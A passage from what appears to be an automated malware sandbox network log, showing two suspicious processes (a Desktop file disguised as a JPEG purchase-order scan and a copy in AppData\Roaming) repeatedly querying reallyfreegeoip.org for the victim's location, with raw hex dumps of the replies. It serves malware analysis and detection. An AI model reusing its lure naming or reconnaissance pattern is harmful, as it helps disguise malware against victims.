                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1191&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2298412&cwnd=236&unsent_bytes=0&cid=26009a1a2dbc1d23&ts=549&x=0"
                                                                                                      2024-10-25 07:18:09 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-25 07:18:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      5192.168.2.449747188.114.97.34437448C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-25 07:18:10 UTC63OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      2024-10-25 07:18:10 UTC890INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:10 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 366
                                                                                                      Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DnellMpwvDTAd74LG%2FiKfgSyTUtY0KiaqxtDByBNj8OnVpeSUBnKi3Kh4o%2FZKFc0183id6LTc2RXSCbfL88vlpUZrorrss3ZD8LBUwMaNoBUsFO3kmar75Xk06daSP7FCn11tLNn"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d806e5b4d98a918-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1565&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1790970&cwnd=177&unsent_bytes=0&cid=0b8b596208c61290&ts=146&x=0"
                                                                                                      2024-10-25 07:18:10 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-25 07:18:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.449748188.114.97.34431260C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-25 07:18:10 UTC63OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      2024-10-25 07:18:10 UTC896INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:10 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 366
                                                                                                      Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3eTNNCKM0eqTg3uiRFos1CWJ8bKdR7tz%2F%2Bti3j7Ba%2FOOL2agw9FHBqTBqGK%2BAj6iS8NmYZhuN3UqHPErF08mbp1qr7X2EOfEsTB8djkNssi6VpTxJ2ltcS5U5H%2FcpxQRNB2b21An"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d806e5dabff45ee-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1603&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1761557&cwnd=237&unsent_bytes=0&cid=a4d5c2ef30fcec59&ts=154&x=0"
                                                                                                      2024-10-25 07:18:10 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-25 07:18:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      7192.168.2.449751188.114.97.34437448C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-25 07:18:11 UTC63OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      2024-10-25 07:18:11 UTC898INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:11 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 367
                                                                                                      Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nnrw85pfDRrAhuwjhxF3L4ersMmjAQo%2FJfZf6c%2Fu4aiGsEpX4e9%2FR7aP%2F%2FDlua3NBAGnLwYOpH1ZF5QDFAHGWkYP4CFBJzumZmuqm42eoBHHofhrFgD8noqDIPFQDk%2FPlmjGvoWQ"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d806e648ad16b22-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2150&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1314571&cwnd=223&unsent_bytes=0&cid=6dbcc1ca65c95c1d&ts=167&x=0"
                                                                                                      2024-10-25 07:18:11 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-25 07:18:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      8192.168.2.449752188.114.97.34431260C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-25 07:18:12 UTC63OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      2024-10-25 07:18:12 UTC901INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:12 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 368
                                                                                                      Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GWZGtAQIgj%2B97LmWwa%2BGppBRXgKraM7Cc9WpWfHfubZfAuofH28%2Bb%2BRS4IN8lSc3z%2FfQxRigqvzc%2BKyYO3%2B5tbXoEcvzd34Oo7VHCQY18jISm5Hfe0%2BPEQx3ow2dokzM2nsfZ6bt"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d806e679b3fddaf-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1231&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2360228&cwnd=32&unsent_bytes=0&cid=b29ab0b1a77c9936&ts=146&x=0"
                                                                                                      2024-10-25 07:18:12 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-25 07:18:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      9192.168.2.449755188.114.97.34437448C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-25 07:18:13 UTC87OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-10-25 07:18:14 UTC890INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:13 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 369
                                                                                                      Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aFXEiZ4vUllQSDESPFjf4cXmSjgcE1kn7kmj8Px%2B06pXzEVY5Cw89sufammr80NxJjirxHt9y9AhDdRPuKZSPLXrU43yBFczoKl7zUOOyDH01%2F4iU6bPuZ3E8s64XIxQ3Vx2TfjB"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d806e713a9e4859-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1159&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2448013&cwnd=244&unsent_bytes=0&cid=9ae1a1cf9cd084dc&ts=298&x=0"
                                                                                                      2024-10-25 07:18:14 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-25 07:18:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      10192.168.2.449756188.114.97.34431260C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-25 07:18:14 UTC87OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-10-25 07:18:14 UTC888INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:14 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 370
                                                                                                      Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IRCqsyAYcHWlVg9Y1w8fp7qJu554I2rtOJsInUZQDFNEbLGCAKPzvXT93HH9C0PCtNK9ZTpKp7mmfHSrPAyharpXHvN7fJ1LQY712G6CXse%2BHnARmVlKD4t5lB6AkECGe8Y1FtkJ"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d806e752ec7ea80-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1103&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2520452&cwnd=248&unsent_bytes=0&cid=ba7ea7d07f633af7&ts=153&x=0"
                                                                                                      2024-10-25 07:18:14 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-25 07:18:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      11192.168.2.449759188.114.97.34437448C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-25 07:18:15 UTC87OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-10-25 07:18:16 UTC892INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:15 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 371
                                                                                                      Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zPOAooMnd6dcZj%2F5g4dYj930LsC5ZYFSjNooUFxXE1NMhLBfaNxSafVLGx19xV1XbzN4sQcdwEt4Ow4e6xUfg75MjWxf7GXNsnf%2FhNh7u%2BbeztfzaczOeL5fnzIVm41LNj6x1lqq"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d806e7dcad2e9b1-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2498&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1155165&cwnd=241&unsent_bytes=0&cid=435285e94817bd3d&ts=150&x=0"
                                                                                                      2024-10-25 07:18:16 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-25 07:18:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      12192.168.2.449761188.114.97.34431260C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-25 07:18:16 UTC63OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      2024-10-25 07:18:16 UTC894INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:16 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 372
                                                                                                      Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3ZdXhcel2Pi3EsUhWTUtLmKj%2FHWlckn6iFYBIOd0L7wjNd%2BCeFWtHrFwfmEUUM9WUbci8ygCC1M75Pa5pkv%2FZyeTJvEWNb%2BT6yTLdFDO4PQ0s41NOzykrG29eMQ0OFct5FqE6DwG"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d806e820cd76b0b-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1758&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1661503&cwnd=251&unsent_bytes=0&cid=db0d3f7751c7b4c7&ts=152&x=0"
                                                                                                      2024-10-25 07:18:16 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-25 07:18:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
